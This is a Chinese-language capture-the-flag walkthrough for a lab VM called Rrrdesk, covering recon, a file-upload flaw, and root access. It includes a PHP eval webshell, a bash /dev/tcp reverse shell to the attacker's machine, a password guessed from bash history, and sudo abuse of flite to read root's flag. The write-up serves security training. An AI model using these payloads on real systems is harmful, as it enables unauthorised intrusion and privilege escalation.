Rrrdesk [群友靶机]

信息收集

1
2
3
4
5
6
7
┌──(root㉿kali)-[~]
└─# arp-scan -l | grep PCS
192.168.31.237  08:00:27:91:3c:4c       PCS Systemtechnik GmbH
                                                                                                                            
┌──(root㉿kali)-[~]
└─# IP=192.168.31.237

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(root㉿kali)-[~]
└─# nmap -sV -sC -A $IP -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-11 10:04 EDT
Nmap scan report for Rrrdesk (192.168.31.237)
Host is up (0.00060s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http          Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: \xE6\x96\x87\xE4\xBB\xB6\xE4\xB8\x8A\xE4\xBC\xA0\xE9\x9D\xB6\xE6\x9C\xBA
3389/tcp open  ms-wbt-server Microsoft Terminal Service
MAC Address: 08:00:27:91:3C:4C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows

TRACEROUTE
HOP RTT     ADDRESS
1   0.61 ms Rrrdesk (192.168.31.237)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.36 seconds

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.237
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,html,bk,zip,tar,php,php3,bak,gz,shtml
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 14529]
/.html                (Status: 403) [Size: 279]
/uploads              (Status: 301) [Size: 318] [--> http://192.168.31.237/uploads/]
/upload.php           (Status: 302) [Size: 0] [--> index.php]
/back.zip             (Status: 200) [Size: 911]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 2426160 / 2426171 (100.00%)
===============================================================
Finished
===============================================================

扫出来 /back.zip ,把这个压缩包下载下来发现里面有 index.phpupload.php

index.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<!DOCTYPE html>
<html>
<head>
    <title>文件上传靶机</title>
</head>
<body>
    <h2>任意文件上传</h2>
    <form action="upload.php" method="POST" enctype="multipart/form-data">
        <input type="file" name="file">
        <input type="submit" value="上传">
    </form>
    <hr>
    <h3>Welcome</h3>
</body>
</html>

upload.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php
$upload_dir = '/var/www/webdav/uploads/';
$filename = $_FILES['file']['name'];
$tmp_name = $_FILES['file']['tmp_name'];

if (!empty($filename)) {
    // 生成MD5文件名(保留原扩展名)
    $file_ext = pathinfo($filename, PATHINFO_EXTENSION);
    $new_name = md5(pathinfo($filename, PATHINFO_FILENAME)) . ($file_ext ? ".$file_ext" : '');
    
    // 移动文件到上传目录
    if (move_uploaded_file($tmp_name, $upload_dir . $new_name)) {
        echo "Upload ok";
    } else {
        echo "文件上传失败!";
    }
} else {
    header("Location: index.php");
}
?>

写个一句话木马放到 shell.php

1
<?php @eval($_GET['cmd']); ?>

然后算得字符串 shell 的 md5 值是 2591c98b70119fe624898b1e424b5e91

因此后门的链接就是 http://192.168.31.237/uploads/2591c98b70119fe624898b1e424b5e91.php

在 kali 上监听

1
nc -lnvp 4444

访问 http://192.168.31.237/uploads/2591c98b70119fe624898b1e424b5e91.php?cmd=system("bash -c 'bash -i >& /dev/tcp/kali的ip地址/4444 0>&1'"); 回到 kali 就会发现连上了

cat /home/lemon/user.txt 取得 flag

1
flag{user-9ffbf43126e33be52cd2bf7e01d627f9}

提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
www-data@Rrrdesk:/home/welcome$ cat /home/lemon/.bash_history
exit
flite -t 'welcome'
exit
ls -al
find .
ls -al
ss -lntup
ip a
ifconfig
ad
echo speaker | md5sum
ls -al
echo speaker | passwd
id
ls -la
exit
sudo -l
sudo gedit
sudo- l
sudo -l
sudo gedit /etc/passwd
sudo -l
sudo /usr/bin/gedit
sudo /usr/bin/gedit --display=:0
sudo /usr/bin/gedit --display=:
sudo /usr/bin/gedit --display=0
sudo /usr/bin/gedit --display=

猜一下用户 lemon 的密码就是 speaker,结果就登进去了

登进去之后在终端跑 sudo -l 看看,发现 /usr/bin/flite 可以无密码运行 sudo

搜了下发现是这个开源的 tts 项目 festvox/flite: A small fast portable speech synthesis system

README 里面提到了:

1
2
Print sentences as they are said
./bin/flite -pw doc/alice

因此运行 sudo /usr/bin/flite -pw /root/root.txt 就能看到 flag 了

HMV-Rrrdesk-1